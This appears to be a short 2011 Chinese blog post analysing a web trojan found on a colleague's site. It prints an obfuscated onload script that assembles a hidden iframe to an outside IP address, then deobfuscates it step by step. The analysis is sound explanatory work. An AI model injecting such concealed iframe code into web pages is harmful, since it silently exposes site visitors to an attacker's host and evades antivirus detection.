网页木马怎么绕开杀毒软件?
时间:2011-03-22 来源:ikoDotA
今天同事的一个网页上被挂马了,很多浏览器都没检测出(google浏览器检查到了),看了一下代码很简单的,代码如下:
挂马代码
挂马代码
<html><body onload="l='//';gf='fr';h='7.1';n='3';f='ame';i='i';m='c';p='tp:';u='2';ze='s';q='8';gg='1';c='6.';jh='erv';k='4';o='0/';b='17';g='ht';t='/';fs='.';qs='sr';s=i.concat(gf,f);zj=qs.concat(m);se=g.concat(p,l,q,gg,fs,b,c,u,n,h,k,o,ze,jh,t);var nu=document.createElement(s);nu.setAttribute('width','5');nu.setAttribute('height','5');nu.setAttribute('style','display:none');nu.setAttribute(zj,se);document.body.appendChild(nu);"></body></html>
分析了下代码如下:(concat() 方法用于连接两个或多个数组。该方法不会改变现有的数组,而仅仅会返回被连接数组的一个副本
):
<script >
l='//';
gf='fr';
h='7.1';
n='3';
f='ame';
i='i';
m='c';
p='tp:';
u='2';
ze='s';
q='8';
gg='1';
c='6.';
jh='erv';
k='4';
o='0/';
b='17';
g='ht';
t='/';
fs='.';
qs='sr';
s=i.concat(gf,f); //s=i fr ame
zj=qs.concat(m); //zj=sr c
se=g.concat(p,l,q,gg,fs,b,c,u,n,h,k,o,ze,jh,t);//se=ht tp: // 8 1 . 17 6. 2 3 7.1 4 0/ s erv /
var nu=document.createElement(s);
nu.setAttribute('width','5');
nu.setAttribute('height','5');
nu.setAttribute('style','display:none');
nu.setAttribute(zj,se);
document.body.appendChild(nu);
</script>
病毒企图就是:
<iframe src="http://81.176.237.140/serv/" width="5" height="5"></iframe>
相关阅读 更多 +
